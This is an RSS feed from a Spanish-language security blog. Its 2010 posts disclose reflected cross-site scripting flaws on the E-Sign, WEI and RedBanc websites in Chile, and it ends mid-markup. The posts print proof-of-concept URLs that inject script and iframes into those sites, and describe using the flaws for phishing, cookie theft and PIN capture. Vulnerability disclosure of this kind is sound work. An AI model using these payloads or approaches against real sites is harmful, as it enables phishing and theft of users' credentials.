<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>El rincón de Zerial &#187; xss</title>
	<atom:link href="http://blog.zerial.org/tag/xss/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.zerial.org</link>
	<description>Informática, GNU/Linux, Seguridad, Hacking, Programación, Ocio</description>
	<lastBuildDate>Tue, 20 Jul 2010 18:13:34 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>E-Sign soluciona problema de seguridad (XSS) en su sitio web</title>
		<link>http://blog.zerial.org/seguridad/e-sign-soluciona-problema-de-seguridad-xss-en-su-sitio-web/</link>
		<comments>http://blog.zerial.org/seguridad/e-sign-soluciona-problema-de-seguridad-xss-en-su-sitio-web/#comments</comments>
		<pubDate>Mon, 03 May 2010 22:41:58 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Sitios Vulnerables]]></category>
		<category><![CDATA[chile]]></category>
		<category><![CDATA[e-sign]]></category>
		<category><![CDATA[empresas]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[respuestas]]></category>
		<category><![CDATA[verisign]]></category>
		<category><![CDATA[vulnerabilidades]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1741</guid>
		<description><![CDATA[Tras el post anterior, la empresa afectada se ha comunicado conmigo vía correo electrónico agradeciendo y comunicando que solucionarán el problema lo antes posible Estimado Fernando: Me dirijo a usted como representante de la Empresa E-Sign, en mi calidad de Gerente de Operaciones,  para comentarle algunos de los alcances que ha tenido para nosotros el  [...]]]></description>
			<content:encoded><![CDATA[<p>Tras el <a href="http://blog.zerial.org/seguridad/cross-site-scripting-en-sitio-verisign-chile-e-sign/">post anterior</a>, la empresa afectada se ha comunicado conmigo vía correo electrónico agradeciendo y comunicando que solucionarán el problema lo antes posible</p>
<blockquote><p>Estimado Fernando:</p>
<p>Me dirijo a usted como representante de la Empresa E-Sign, en mi calidad de Gerente de Operaciones,  para comentarle algunos de los alcances que ha tenido para nosotros el  reporte de vulnerabilidad XSS que usted ha publicado a fines de la semana pasada.  Con su información hemos verificado los errores reportados, y nuestros programadores se encuentran trabajando en la revisión y corrección de otros posibles problemas. Específicamente, aquellos relacionados con el “<em>contacto.php</em>” se corrigieron el 30 de Abril en la tarde.</p>
<p>Le agradecería que, en el caso de detectar una nueva vulnerabilidad o la posibilidad de ella en nuestro sitio, lo informe directamente a mi correo particular o telefónicamente a la empresa. Asimismo, le solicitamos que nos dé un  espacio de tiempo suficiente para corregir el problema, antes de publicarlo en internet.</p>
<p>Finalmente, a nombre de E-Sign, quisiéramos agradecerle su nota y enfatizar que tomaremos todas las medidas necesarias para evitar que este tipo de problemas vuelvan a ocurrir.</p></blockquote>
<p>Creo que es una buena respuesta y es la forma en que deberían actuar las empresas cuando se les informa sobre algún fallo, bug o vulnerabilidad que los afecta.<br />
Podemos ver que el enlace vulnerable: <a href="https://www.e-sign.cl/contacto.php?prefilla=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E">https://www.e-sign.cl/contacto.php?prefilla=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E</a> ya no se ve afectado.</p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fe-sign-soluciona-problema-de-seguridad-xss-en-su-sitio-web%2F&amp;linkname=E-Sign%20soluciona%20problema%20de%20seguridad%20%28XSS%29%20en%20su%20sitio%20web" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fe-sign-soluciona-problema-de-seguridad-xss-en-su-sitio-web%2F&amp;linkname=E-Sign%20soluciona%20problema%20de%20seguridad%20%28XSS%29%20en%20su%20sitio%20web" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fe-sign-soluciona-problema-de-seguridad-xss-en-su-sitio-web%2F&amp;linkname=E-Sign%20soluciona%20problema%20de%20seguridad%20%28XSS%29%20en%20su%20sitio%20web" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fe-sign-soluciona-problema-de-seguridad-xss-en-su-sitio-web%2F&amp;linkname=E-Sign%20soluciona%20problema%20de%20seguridad%20%28XSS%29%20en%20su%20sitio%20web" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fe-sign-soluciona-problema-de-seguridad-xss-en-su-sitio-web%2F&amp;linkname=E-Sign%20soluciona%20problema%20de%20seguridad%20%28XSS%29%20en%20su%20sitio%20web" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fe-sign-soluciona-problema-de-seguridad-xss-en-su-sitio-web%2F&amp;linkname=E-Sign%20soluciona%20problema%20de%20seguridad%20%28XSS%29%20en%20su%20sitio%20web" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fe-sign-soluciona-problema-de-seguridad-xss-en-su-sitio-web%2F&amp;linkname=E-Sign%20soluciona%20problema%20de%20seguridad%20%28XSS%29%20en%20su%20sitio%20web" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fe-sign-soluciona-problema-de-seguridad-xss-en-su-sitio-web%2F&amp;linkname=E-Sign%20soluciona%20problema%20de%20seguridad%20%28XSS%29%20en%20su%20sitio%20web">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/e-sign-soluciona-problema-de-seguridad-xss-en-su-sitio-web/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Cross-Site Scripting en sitio VeriSign Chile (E-Sign)</title>
		<link>http://blog.zerial.org/seguridad/cross-site-scripting-en-sitio-verisign-chile-e-sign/</link>
		<comments>http://blog.zerial.org/seguridad/cross-site-scripting-en-sitio-verisign-chile-e-sign/#comments</comments>
		<pubDate>Thu, 29 Apr 2010 18:49:57 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Sitios Vulnerables]]></category>
		<category><![CDATA[cross-site scripting]]></category>
		<category><![CDATA[inseguridad]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[sitios vulnerables]]></category>
		<category><![CDATA[ssl]]></category>
		<category><![CDATA[verisign]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1715</guid>
		<description><![CDATA[E-Sign (cl) corresponde a los representantes y/o partners de VeriSign, una reconocida marca de seguridad informática a nivel mundial y como tal, ofrecen servicios de seguridad informatica, certificados de seguridad, auditorias, etc. La empresa E-Sign ofrece el servicio de Anti Phishing y Consultoría de Seguridad, entre otros. Sin embargo, el sitio web de dicha empresa [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://blog.zerial.org/wp-content/uploads/2010/04/esignverisign.png"><img class="size-full wp-image-1718 alignleft" style="margin-left: 1px; margin-right: 1px;" title="esignverisign" src="http://blog.zerial.org/wp-content/uploads/2010/04/esignverisign.png" alt="" width="172" height="44" /></a><a href="http://www.e-sign.cl">E-Sign (cl)</a> corresponde a los representantes y/o partners de <a href="http://www.verisign.com/">VeriSign</a>, una reconocida marca de seguridad informática a nivel mundial y como tal, ofrecen servicios de seguridad informatica, certificados de seguridad, auditorias, etc.<br />
La empresa E-Sign ofrece el servicio de <strong>Anti Phishing</strong> y Consultoría de Seguridad, entre otros. Sin embargo, el sitio web de dicha empresa es <strong>vulnerable</strong> a Cross-Site Scripting y mediante esto, podemos hacer phishing usando la &#8220;credibilidad&#8221; de su certificado SSL.</p>
<p>La idea de un sitio con certificado SSL es que toda la información viaje cifrada, pero la gente de E-Sign al parecer no piensan eso. Al menos dos formularios del sitio envían la información sin cifrar, entonces ¿Para qué usan el certificado SSL?</p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/04/esign_form1.png"><img class="aligncenter size-full wp-image-1727" title="esign_form1" src="http://blog.zerial.org/wp-content/uploads/2010/04/esign_form1.png" alt="" width="543" height="64" /></a></p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/04/esign_form2.png"><img class="aligncenter size-full wp-image-1728" title="esign_form2" src="http://blog.zerial.org/wp-content/uploads/2010/04/esign_form2.png" alt="" width="519" height="55" /></a></p>
<p>Quizá no es tan crítico, ya que se trata del formulario de contacto y el buscador, pero ya que ellos <strong>obligan</strong> al usuario a confiar de ellos aun cuando los formularios no se envian de forma segura, nosotros aprovecharemos de generar otro tipo de trafico de manera insegura, por ejemplo insertando un formulario falso o un sitio externo mediante XSS.</p>
<p><span id="more-1715"></span></p>
<p>¿A qué me refiero con esto? Sencillo, cuando estás navegando en un sitio seguro y en él, existe información que viaja de manera no-segura (sin cifrar), el navegador nos alerta y nos pregunta si queremos continuar.</p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/04/esign_warning.png"><img class="aligncenter size-full wp-image-1731" title="esign_warning" src="http://blog.zerial.org/wp-content/uploads/2010/04/esign_warning.png" alt="" width="669" height="168" /></a></p>
<p>En cierta forma, E-Sign está obligando al usuario a confiar en ellos y para proceder, el usuario tendrá que poner aceptar. Si ellos lo hacen, ¿por qué nosotros no?</p>
<p>Nos aprovechamos de una vulnerabilidad XSS que presentan algunos links, por ejemplo link de &#8220;Contacto&#8221;:</p>
<p><a href="https://www.e-sign.cl/contacto.php?prefilla=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E" target="_blank">https://www.e-sign.cl/contacto.php?prefilla=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E</a></p>
<p>Mediante XSS podriamos perfectamente modificar el formulario, agregar y quitar campos y redireccionar la informción hacia otro sitio o bien colocar un iframe externo que nos permita insertar un formulario arbitrario para capturar información que necesitamos.</p>
<p>Con un poco de ingenieria social y un poco del arte del engaño, seguramente podemos explotar aun mas esta vulnerabilidad. Muchas veces la vulnerabilidad va más alla de si misma, depende mucho del sitio sobre el cual se intenta explotar, en este caso, es mucho mas grave que en el caso del <a href="http://blog.zerial.org/seguridad/xss-en-sitio-web-de-wei/">post anterior</a>.</p>
<p>Lo que encuentro más problematico, es que una empresa de seguridad, quienes ofrecen un servicio Anti Phishing, tengan este tipo de vulnerabilidades, le resta demasiada credibilidad a la empresa, lamentablemente las personas que contratan estos servicios generalmente no saben mucho del tema y creen que estaran en buenas manos y muchas veces estan cometiendo un error entregando su seguridad a las personas equivocadas.</p>
<p>Como de costumbre, intenté contactarme con los encargados mediante el formulario de contacto del sitio pero no he obtenido ningun tipo de respuesta.</p>
<p><strong>ACTUALIZACIóN &#8211; 3/Mayo/2010: </strong>La empresa se ha contactado conmigo via email. <a href="http://blog.zerial.org/seguridad/e-sign-soluciona-problema-de-seguridad-xss-en-su-sitio-web/">Más información acá</a>.</p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcross-site-scripting-en-sitio-verisign-chile-e-sign%2F&amp;linkname=Cross-Site%20Scripting%20en%20sitio%20VeriSign%20Chile%20%28E-Sign%29" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcross-site-scripting-en-sitio-verisign-chile-e-sign%2F&amp;linkname=Cross-Site%20Scripting%20en%20sitio%20VeriSign%20Chile%20%28E-Sign%29" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcross-site-scripting-en-sitio-verisign-chile-e-sign%2F&amp;linkname=Cross-Site%20Scripting%20en%20sitio%20VeriSign%20Chile%20%28E-Sign%29" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcross-site-scripting-en-sitio-verisign-chile-e-sign%2F&amp;linkname=Cross-Site%20Scripting%20en%20sitio%20VeriSign%20Chile%20%28E-Sign%29" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcross-site-scripting-en-sitio-verisign-chile-e-sign%2F&amp;linkname=Cross-Site%20Scripting%20en%20sitio%20VeriSign%20Chile%20%28E-Sign%29" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcross-site-scripting-en-sitio-verisign-chile-e-sign%2F&amp;linkname=Cross-Site%20Scripting%20en%20sitio%20VeriSign%20Chile%20%28E-Sign%29" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcross-site-scripting-en-sitio-verisign-chile-e-sign%2F&amp;linkname=Cross-Site%20Scripting%20en%20sitio%20VeriSign%20Chile%20%28E-Sign%29" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcross-site-scripting-en-sitio-verisign-chile-e-sign%2F&amp;linkname=Cross-Site%20Scripting%20en%20sitio%20VeriSign%20Chile%20%28E-Sign%29">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/cross-site-scripting-en-sitio-verisign-chile-e-sign/feed/</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>XSS en sitio web de WEI</title>
		<link>http://blog.zerial.org/seguridad/xss-en-sitio-web-de-wei/</link>
		<comments>http://blog.zerial.org/seguridad/xss-en-sitio-web-de-wei/#comments</comments>
		<pubDate>Wed, 28 Apr 2010 13:16:06 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Sitios Vulnerables]]></category>
		<category><![CDATA[cookies]]></category>
		<category><![CDATA[cross-site scripting]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1665</guid>
		<description><![CDATA[El sitio web de WEI (una tienda de productos informáticos) presenta una vulnerabilidad XSS en su buscador, ésto podría permitir el robo de identidad y acceso a información confidencial de sus clientes. La URL vulnerable es http://www.wei.cl/catalogue/product_search.htm?ph=&#38;query= Podemos inyectar código javascript en el valor de la variable &#8220;ph&#8221; y con esto insertar un frame o [...]]]></description>
			<content:encoded><![CDATA[<p>El sitio web de WEI (una tienda de productos informáticos) presenta una vulnerabilidad XSS en su buscador, ésto podría permitir el robo de identidad y acceso a información confidencial de sus clientes.</p>
<p>La URL vulnerable es</p>
<p><strong>http://www.wei.cl/catalogue/product_search.htm?ph=&amp;query=</strong></p>
<p>Podemos inyectar código javascript en el valor de la variable &#8220;ph&#8221; y con esto insertar un frame o algun elemento externo al sitio y hacelo parecer como si fuera del sitio usando la confianza que tienen los clientes, como por ejemplo un iframe o bien un javascript que nos envie la cookie de la sesion a otro sitio.</p>
<p><strong>Prueba de Concepto (PoC)</strong></p>
<p><a href="http://www.wei.cl/catalogue/product_search.htm?ph=%22%3E%3Cscript%3Ealert%28this%29%3C/script%3E&amp;query=+++++Buscar+++++"><strong>http://www.wei.cl/catalogue/product_search.htm?ph=%22%3E%3Cscript%3Ealert%28this%29%3C/script%3E&amp;query=+++++Buscar+++++</strong></a></p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/04/wei1.png"><img class="aligncenter size-full wp-image-1690" title="wei1" src="http://blog.zerial.org/wp-content/uploads/2010/04/wei1.png" alt="" width="518" height="309" /></a><a href="http://www.wei.cl/catalogue/product_search.htm?ph=%22%3E%3Ciframe%20src=%22http://google.com%22%3E%3C/iframe%3E&amp;query=+++++Buscar+++++"><strong>http://www.wei.cl/catalogue/product_search.htm?ph=%22%3E%3Ciframe%20src=%22http://google.com%22%3E%3C/iframe%3E&amp;query=+++++Buscar+++++</strong></a></p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/04/wei2.png"><img class="aligncenter size-full wp-image-1691" title="wei2" src="http://blog.zerial.org/wp-content/uploads/2010/04/wei2.png" alt="" width="458" height="412" /></a></p>
<p>En el sitio se pueden encontrar links de contacto y emails para escribir tipo info@wei.cl, ni los links ni los emails funcionan. Intenté reportar el problema pero el correo que envié al destinatario que en la misma página aparece, me rebotó.</p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fxss-en-sitio-web-de-wei%2F&amp;linkname=XSS%20en%20sitio%20web%20de%20WEI" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fxss-en-sitio-web-de-wei%2F&amp;linkname=XSS%20en%20sitio%20web%20de%20WEI" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fxss-en-sitio-web-de-wei%2F&amp;linkname=XSS%20en%20sitio%20web%20de%20WEI" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fxss-en-sitio-web-de-wei%2F&amp;linkname=XSS%20en%20sitio%20web%20de%20WEI" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fxss-en-sitio-web-de-wei%2F&amp;linkname=XSS%20en%20sitio%20web%20de%20WEI" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fxss-en-sitio-web-de-wei%2F&amp;linkname=XSS%20en%20sitio%20web%20de%20WEI" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fxss-en-sitio-web-de-wei%2F&amp;linkname=XSS%20en%20sitio%20web%20de%20WEI" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fxss-en-sitio-web-de-wei%2F&amp;linkname=XSS%20en%20sitio%20web%20de%20WEI">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/xss-en-sitio-web-de-wei/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Grave vulnerabilidad del tipo Cross-Site Scripting en sitio web de RedBanc</title>
		<link>http://blog.zerial.org/seguridad/vulnerabilidad-cross-site-scripting-xss-en-sitio-web-de-redbanc/</link>
		<comments>http://blog.zerial.org/seguridad/vulnerabilidad-cross-site-scripting-xss-en-sitio-web-de-redbanc/#comments</comments>
		<pubDate>Thu, 25 Feb 2010 14:22:10 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Sitios Vulnerables]]></category>
		<category><![CDATA[cross-site scripting]]></category>
		<category><![CDATA[inseguridad]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[redbanc]]></category>
		<category><![CDATA[sitios vulnerables]]></category>
		<category><![CDATA[vulnerabilidad web]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1566</guid>
		<description><![CDATA[La semana pasada he descubierto una vulnerabilidad Cross-Site Scripting (XSS) en el sitio web de RedBanc. Redbanc S.A.. es una empresa que presta servicios de interconexión bancaria, es decir permite a los clientes de todos los bancos asociados realizar distintas operaciones, depósitos, transferencias, giros, etc. a través de una red cajeros automáticos, que son computadores [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://blog.zerial.org/wp-content/uploads/2010/02/redbanc.png"><img src="http://blog.zerial.org/wp-content/uploads/2010/02/redbanc.png" alt="" title="redbanc" width="523" height="370" class="aligncenter size-full wp-image-1575" /></a></p>
<p>La semana pasada he descubierto una vulnerabilidad Cross-Site Scripting (XSS) en el sitio web de RedBanc.</p>
<blockquote><p>Redbanc S.A.. es una empresa que presta servicios de interconexión bancaria, es decir permite a los clientes de todos los bancos asociados realizar distintas operaciones, depósitos, transferencias, giros, etc.  a través de una red cajeros automáticos, que son computadores interconectados, permitiéndole al cliente realizar una serie de operaciones que antiguamente se debían realizar en una caja normal y con la restricción del horario. </p></blockquote>
<p>Está de más decir que con esta vulnerabilidad encontrada es posible realizar phishing, robos de identidad (robos de cookies mediante xss) y muchas otras cosas más relacionadas con estáfas usando la confianza el sitio RedBanc.cl.</p>
<p><span id="more-1566"></span></p>
<p>La vulnerabilidad se encuentra en la no-validación de los parametros de entrada en la URL <strong>http://www.redbanc.cl/portal_redbanc/browse?pagina=portal_redbanc/inicio.htm</strong>. Si modificamos la variable &#8220;pagina&#8221; y preparamos un javascript especialmente para el robo de cookies o bien algun sitio web externo que nos permita hacer phishing, basta con que coloquemos el código necesario y se lo asignemos a la variable.</p>
<h3>Explicación</h3>
<p>Cuando se cambia el valor de la variable <em>pagina</em> el sistema reportará que la página no existe. El mensaje de error tomará el valor que ingresamos en la variable y lo mostrará de la siguiente forma:<br />
- En el caso de <strong>http://www.redbanc.cl/portal_redbanc/browse?pagina=veamos/si/existe/la/pagina.htm</strong> podemos ver el mensaje de error </p>
<blockquote><p>Pagina no existe<br />
Pagina veamos/si/existe/la/pagina.htm no disponible</p></blockquote>
<p>Si nos damos cuenta, lo que dice justo debajo de &#8220;Pagina no existe&#8221; es justo lo que pusimos como valor de la variable <em>pagina</em> por lo que asumimos que cualqiuer cosa que pongamos en su lugar será mostrado y por ende si inyectamos un código html éste será mostrado e interpretado por nuestro navegador.</p>
<h3>PoC</h3>
<p>Inyectando un código javascript:<br />
<code>http://www.redbanc.cl/portal_redbanc/browse?pagina=&lt;script&gt;alert('XSS')&lt;/script&gt;</code></p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/02/poc_redbanc_xss.png"><img src="http://blog.zerial.org/wp-content/uploads/2010/02/poc_redbanc_xss.png" alt="" title="poc_redbanc_xss" width="364" height="208" class="aligncenter size-full wp-image-1591" /></a></p>
<p>Inyectando un <em>iframe</em> con destino a otro sitio, el cual podría contener un sitio web maligno:<br />
<code>http://www.redbanc.cl/portal_redbanc/browse?pagina=&lt;iframe src=http://sitio.web&lt;/iframe&gt;&lt;/iframe&gt;</code></p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/02/poc_redbanc_iframe.png"><img src="http://blog.zerial.org/wp-content/uploads/2010/02/poc_redbanc_iframe-300x135.png" alt="" title="poc_redbanc_iframe" width="300" height="135" class="aligncenter size-medium wp-image-1592" /></a><br />
(más información sobre este último punto en: <a href="http://blog.zerial.org/seguridad/haciendo-phishing-explotando-una-vulnerabilidad-xss/">Haciendo phishing explotando una vulnerabilidad XSS</a>)</p>
<p>He intentado contactarme con los encargados del desarrollo del sitio pero no he obtenido respuesta. El formulario de contacto del mismo sitio web no funciona y he estado enviando correos a info@redbanc.cl (correo que aparece en el sitio web) y ni si quiera me han respondido que leyeron el correo.</p>
<h3>Los riesgos</h3>
<p>Los chilenos bien saben lo que es RedBanc y deberían imaginar los peligros que puede significar un fallo de este tipo en el sitio web oficial.<br />
Explotando esta vulnerabilidad es posible robar la identidad de personas y obtener información privadas tales como nombres, rut, telefonos, números de cuenta bancaria y claves de acceso. Tratandose de un sitio web que tiene directa relacion con los bancos y tarjetas de débito es posible tambien obtener los dígitos del PIN PASS, usando un poco de <em>ingenieria social</em> y engañando a los usuarios con falsos e identicos sitios y formularios.</p>
<h3>Aclaración</h3>
<p>La vulnerabilidad fue avisada el Jueves de la semana pasada por primera vez, luego intente contactarme con ellos el día Lunes y tambien el Martes y, siendo Jueves, aún no he obtenido ninguna respuesta, ni si quiera acusando que el correo que les envié fue recibido.</p>
<p><strong>ACTUALIZACIóN &#8211; 5/Mar/2010 12:30</strong><br />
Luego de numerosos correos enviados a la gente de redbanc reportando el error y sin obtener ninguna respuesta, decidí publicar este artículo y parece que ha dado resultado, porque la gente de <a href="http://www.redbanc.cl">Redbanc</a> ya ha <strong>solucionado</strong> el problema, obviamente sin agradecer y sin emitir ningun tipo de comentario al respecto, simpemente solucionaron el problema como si nada ha pasado.<br />
Buscando en Google me he dado cuenta que este sitio ha tenido esta misma vulnerabilidad en distintos scripts y y redbanc nunca dijo nada.</p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fvulnerabilidad-cross-site-scripting-xss-en-sitio-web-de-redbanc%2F&amp;linkname=Grave%20vulnerabilidad%20del%20tipo%20Cross-Site%20Scripting%20en%20sitio%20web%20de%20RedBanc" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fvulnerabilidad-cross-site-scripting-xss-en-sitio-web-de-redbanc%2F&amp;linkname=Grave%20vulnerabilidad%20del%20tipo%20Cross-Site%20Scripting%20en%20sitio%20web%20de%20RedBanc" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a 